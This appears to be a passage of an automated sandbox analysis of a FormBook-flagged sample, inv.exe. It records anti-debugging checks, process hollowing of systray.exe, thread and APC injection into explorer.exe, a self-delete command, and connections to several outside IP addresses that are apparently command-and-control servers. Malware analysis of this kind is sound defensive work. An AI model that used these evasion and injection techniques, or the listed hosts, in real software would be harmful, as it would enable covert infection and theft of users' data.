Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0481B02A mov eax, dword ptr fs:[00000030h]		5_2_0481B02A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0481B02A mov eax, dword ptr fs:[00000030h]		5_2_0481B02A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0481B02A mov eax, dword ptr fs:[00000030h]		5_2_0481B02A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0481B02A mov eax, dword ptr fs:[00000030h]		5_2_0481B02A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0483002D mov eax, dword ptr fs:[00000030h]		5_2_0483002D
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0483002D mov eax, dword ptr fs:[00000030h]		5_2_0483002D
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0483002D mov eax, dword ptr fs:[00000030h]		5_2_0483002D
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0483002D mov eax, dword ptr fs:[00000030h]		5_2_0483002D
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0483002D mov eax, dword ptr fs:[00000030h]		5_2_0483002D
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04820050 mov eax, dword ptr fs:[00000030h]		5_2_04820050
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04820050 mov eax, dword ptr fs:[00000030h]		5_2_04820050
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048D1074 mov eax, dword ptr fs:[00000030h]		5_2_048D1074
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048C2073 mov eax, dword ptr fs:[00000030h]		5_2_048C2073
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0482C182 mov eax, dword ptr fs:[00000030h]		5_2_0482C182
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0483A185 mov eax, dword ptr fs:[00000030h]		5_2_0483A185
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04832990 mov eax, dword ptr fs:[00000030h]		5_2_04832990
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048361A0 mov eax, dword ptr fs:[00000030h]		5_2_048361A0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048361A0 mov eax, dword ptr fs:[00000030h]		5_2_048361A0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048C49A4 mov eax, dword ptr fs:[00000030h]		5_2_048C49A4
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048C49A4 mov eax, dword ptr fs:[00000030h]		5_2_048C49A4
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048C49A4 mov eax, dword ptr fs:[00000030h]		5_2_048C49A4
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048C49A4 mov eax, dword ptr fs:[00000030h]		5_2_048C49A4
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048869A6 mov eax, dword ptr fs:[00000030h]		5_2_048869A6
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048851BE mov eax, dword ptr fs:[00000030h]		5_2_048851BE
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048851BE mov eax, dword ptr fs:[00000030h]		5_2_048851BE
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048851BE mov eax, dword ptr fs:[00000030h]		5_2_048851BE
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048851BE mov eax, dword ptr fs:[00000030h]		5_2_048851BE
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048941E8 mov eax, dword ptr fs:[00000030h]		5_2_048941E8
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0480B1E1 mov eax, dword ptr fs:[00000030h]		5_2_0480B1E1
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0480B1E1 mov eax, dword ptr fs:[00000030h]		5_2_0480B1E1
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0480B1E1 mov eax, dword ptr fs:[00000030h]		5_2_0480B1E1
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04809100 mov eax, dword ptr fs:[00000030h]		5_2_04809100
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04809100 mov eax, dword ptr fs:[00000030h]		5_2_04809100
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04809100 mov eax, dword ptr fs:[00000030h]		5_2_04809100
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04824120 mov eax, dword ptr fs:[00000030h]		5_2_04824120
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04824120 mov eax, dword ptr fs:[00000030h]		5_2_04824120
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04824120 mov eax, dword ptr fs:[00000030h]		5_2_04824120
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04824120 mov eax, dword ptr fs:[00000030h]		5_2_04824120
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04824120 mov ecx, dword ptr fs:[00000030h]		5_2_04824120
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0483513A mov eax, dword ptr fs:[00000030h]		5_2_0483513A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0483513A mov eax, dword ptr fs:[00000030h]		5_2_0483513A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0482B944 mov eax, dword ptr fs:[00000030h]		5_2_0482B944
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0482B944 mov eax, dword ptr fs:[00000030h]		5_2_0482B944
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0480C962 mov eax, dword ptr fs:[00000030h]		5_2_0480C962
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0480B171 mov eax, dword ptr fs:[00000030h]		5_2_0480B171
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0480B171 mov eax, dword ptr fs:[00000030h]		5_2_0480B171
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0483D294 mov eax, dword ptr fs:[00000030h]		5_2_0483D294
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0483D294 mov eax, dword ptr fs:[00000030h]		5_2_0483D294
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048052A5 mov eax, dword ptr fs:[00000030h]		5_2_048052A5
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048052A5 mov eax, dword ptr fs:[00000030h]		5_2_048052A5
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048052A5 mov eax, dword ptr fs:[00000030h]		5_2_048052A5
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048052A5 mov eax, dword ptr fs:[00000030h]		5_2_048052A5
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048052A5 mov eax, dword ptr fs:[00000030h]		5_2_048052A5
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0481AAB0 mov eax, dword ptr fs:[00000030h]		5_2_0481AAB0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0481AAB0 mov eax, dword ptr fs:[00000030h]		5_2_0481AAB0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0483FAB0 mov eax, dword ptr fs:[00000030h]		5_2_0483FAB0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04832ACB mov eax, dword ptr fs:[00000030h]		5_2_04832ACB
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04832AE4 mov eax, dword ptr fs:[00000030h]		5_2_04832AE4
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04818A0A mov eax, dword ptr fs:[00000030h]		5_2_04818A0A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04805210 mov eax, dword ptr fs:[00000030h]		5_2_04805210
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04805210 mov ecx, dword ptr fs:[00000030h]		5_2_04805210
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04805210 mov eax, dword ptr fs:[00000030h]		5_2_04805210
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04805210 mov eax, dword ptr fs:[00000030h]		5_2_04805210
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0480AA16 mov eax, dword ptr fs:[00000030h]		5_2_0480AA16
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0480AA16 mov eax, dword ptr fs:[00000030h]		5_2_0480AA16
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048CAA16 mov eax, dword ptr fs:[00000030h]		5_2_048CAA16
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048CAA16 mov eax, dword ptr fs:[00000030h]		5_2_048CAA16
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04823A1C mov eax, dword ptr fs:[00000030h]		5_2_04823A1C
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04844A2C mov eax, dword ptr fs:[00000030h]		5_2_04844A2C
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04844A2C mov eax, dword ptr fs:[00000030h]		5_2_04844A2C
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04809240 mov eax, dword ptr fs:[00000030h]		5_2_04809240
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04809240 mov eax, dword ptr fs:[00000030h]		5_2_04809240
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04809240 mov eax, dword ptr fs:[00000030h]		5_2_04809240
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04809240 mov eax, dword ptr fs:[00000030h]		5_2_04809240
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048CEA55 mov eax, dword ptr fs:[00000030h]		5_2_048CEA55
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04894257 mov eax, dword ptr fs:[00000030h]		5_2_04894257
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048BB260 mov eax, dword ptr fs:[00000030h]		5_2_048BB260
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048BB260 mov eax, dword ptr fs:[00000030h]		5_2_048BB260
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048D8A62 mov eax, dword ptr fs:[00000030h]		5_2_048D8A62
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0484927A mov eax, dword ptr fs:[00000030h]		5_2_0484927A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048C138A mov eax, dword ptr fs:[00000030h]		5_2_048C138A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048BD380 mov ecx, dword ptr fs:[00000030h]		5_2_048BD380
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04811B8F mov eax, dword ptr fs:[00000030h]		5_2_04811B8F
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04811B8F mov eax, dword ptr fs:[00000030h]		5_2_04811B8F
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0483B390 mov eax, dword ptr fs:[00000030h]		5_2_0483B390
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04832397 mov eax, dword ptr fs:[00000030h]		5_2_04832397
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048D5BA5 mov eax, dword ptr fs:[00000030h]		5_2_048D5BA5
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04834BAD mov eax, dword ptr fs:[00000030h]		5_2_04834BAD
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04834BAD mov eax, dword ptr fs:[00000030h]		5_2_04834BAD
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04834BAD mov eax, dword ptr fs:[00000030h]		5_2_04834BAD
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048853CA mov eax, dword ptr fs:[00000030h]		5_2_048853CA
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048853CA mov eax, dword ptr fs:[00000030h]		5_2_048853CA
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048303E2 mov eax, dword ptr fs:[00000030h]		5_2_048303E2
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048303E2 mov eax, dword ptr fs:[00000030h]		5_2_048303E2
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048303E2 mov eax, dword ptr fs:[00000030h]		5_2_048303E2
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048303E2 mov eax, dword ptr fs:[00000030h]		5_2_048303E2
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048303E2 mov eax, dword ptr fs:[00000030h]		5_2_048303E2
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048303E2 mov eax, dword ptr fs:[00000030h]		5_2_048303E2
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0482DBE9 mov eax, dword ptr fs:[00000030h]		5_2_0482DBE9
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048C131B mov eax, dword ptr fs:[00000030h]		5_2_048C131B
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0480DB40 mov eax, dword ptr fs:[00000030h]		5_2_0480DB40
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048D8B58 mov eax, dword ptr fs:[00000030h]		5_2_048D8B58
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0480F358 mov eax, dword ptr fs:[00000030h]		5_2_0480F358
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0480DB60 mov ecx, dword ptr fs:[00000030h]		5_2_0480DB60
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04833B7A mov eax, dword ptr fs:[00000030h]		5_2_04833B7A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04833B7A mov eax, dword ptr fs:[00000030h]		5_2_04833B7A

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\inv.exe

Code function: 0_2_0099A55A GetProcessHeap,

0_2_0099A55A

Enables debug privileges

Source: C:\Users\user\Desktop\inv.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process token adjusted: Debug			Jump to behavior

Contains functionality to register its own exception handler

Source: C:\Users\user\Desktop\inv.exe	Code function: 0_2_00972109 SetUnhandledExceptionFilter,		0_2_00972109
Source: C:\Users\user\Desktop\inv.exe	Code function: 0_2_00971755 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_00971755
Source: C:\Users\user\Desktop\inv.exe	Code function: 0_2_00991BC8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_00991BC8
Source: C:\Users\user\Desktop\inv.exe	Code function: 0_2_00971F74 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_00971F74
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_00972109 SetUnhandledExceptionFilter,		2_2_00972109

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 104.164.35.80 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.227.38.74 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 184.168.131.241 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 173.192.101.248 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 81.88.57.68 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 192.185.199.129 80			Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\inv.exe	Section loaded: unknown target: C:\Users\user\Desktop\inv.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\Desktop\inv.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\Desktop\inv.exe	Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\Desktop\inv.exe	Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write			Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\inv.exe	Thread register set: target process: 3292			Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Thread register set: target process: 3292			Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\inv.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\inv.exe

Section unmapped: C:\Windows\SysWOW64\systray.exe base address: F00000

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\inv.exe	Process created: C:\Users\user\Desktop\inv.exe C:\Users\user\Desktop\inv.exe			Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\inv.exe'			Jump to behavior

May try to detect the Windows Explorer process (often used for injection)

Source: explorer.exe, 00000003.00000000.248446236.0000000001400000.00000002.00000001.sdmp, systray.exe, 00000005.00000002.1315801398.00000000030A0000.00000002.00000001.sdmp	Binary or memory string: uProgram Manager
Source: explorer.exe, 00000003.00000000.260039044.0000000005F40000.00000004.00000001.sdmp, systray.exe, 00000005.00000002.1315801398.00000000030A0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.248446236.0000000001400000.00000002.00000001.sdmp, systray.exe, 00000005.00000002.1315801398.00000000030A0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000003.00000002.1314890488.0000000000EB8000.00000004.00000020.sdmp	Binary or memory string: ProgmanX
Source: explorer.exe, 00000003.00000000.248446236.0000000001400000.00000002.00000001.sdmp, systray.exe, 00000005.00000002.1315801398.00000000030A0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000003.00000000.263820453.0000000008ACF000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWndAj

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\inv.exe

Code function: 0_2_0097221B cpuid

0_2_0097221B

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\inv.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,		0_2_009988A8
Source: C:\Users\user\Desktop\inv.exe	Code function: EnumSystemLocalesW,		0_2_00998BB3
Source: C:\Users\user\Desktop\inv.exe	Code function: EnumSystemLocalesW,		0_2_00998B4A
Source: C:\Users\user\Desktop\inv.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,		0_2_00998CD9
Source: C:\Users\user\Desktop\inv.exe	Code function: EnumSystemLocalesW,		0_2_00998C4E
Source: C:\Users\user\Desktop\inv.exe	Code function: GetLocaleInfoW,		0_2_00998F2C
Source: C:\Users\user\Desktop\inv.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,		0_2_00999052
Source: C:\Users\user\Desktop\inv.exe	Code function: GetLocaleInfoW,		0_2_00999158
Source: C:\Users\user\Desktop\inv.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,		0_2_00999227
Source: C:\Users\user\Desktop\inv.exe	Code function: EnumSystemLocalesW,		0_2_0099942F
Source: C:\Users\user\Desktop\inv.exe	Code function: EnumSystemLocalesW,		0_2_009995AA
Source: C:\Users\user\Desktop\inv.exe	Code function: EnumSystemLocalesW,		0_2_00999570
Source: C:\Users\user\Desktop\inv.exe	Code function: GetLocaleInfoW,		0_2_00999ED1
Source: C:\Users\user\Desktop\inv.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,		2_2_009988A8
Source: C:\Users\user\Desktop\inv.exe	Code function: EnumSystemLocalesW,		2_2_00998BB3
Source: C:\Users\user\Desktop\inv.exe	Code function: EnumSystemLocalesW,		2_2_00998B4A
Source: C:\Users\user\Desktop\inv.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,		2_2_00998CD9
Source: C:\Users\user\Desktop\inv.exe	Code function: EnumSystemLocalesW,		2_2_00998C4E
Source: C:\Users\user\Desktop\inv.exe	Code function: GetLocaleInfoW,		2_2_00998F2C
Source: C:\Users\user\Desktop\inv.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,		2_2_00999052
Source: C:\Users\user\Desktop\inv.exe	Code function: GetLocaleInfoW,		2_2_00999158
Source: C:\Users\user\Desktop\inv.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,		2_2_00999227
Source: C:\Users\user\Desktop\inv.exe	Code function: EnumSystemLocalesW,		2_2_0099942F
Source: C:\Users\user\Desktop\inv.exe	Code function: EnumSystemLocalesW,		2_2_009995AA

Contains functionality to query local / system time

Source: C:\Users\user\Desktop\inv.exe

Code function: 0_2_00971E43 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00971E43

Stealing of Sensitive Information:

Yara detected FormBook

Source: Yara match	File source: 00000002.00000002.283524182.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1315254227.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1314348434.0000000000730000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.244233732.00000000009B8000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.283891864.00000000013E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.283912769.0000000001410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1315337696.0000000000ED0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.inv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.inv.exe.970000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.inv.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Source: Yara match	File source: 00000002.00000002.283524182.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1315254227.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1314348434.0000000000730000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.244233732.00000000009B8000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.283891864.00000000013E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.283912769.0000000001410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1315337696.0000000000ED0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.inv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.inv.exe.970000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.inv.exe.400000.0.raw.unpack, type: UNPACKEDPE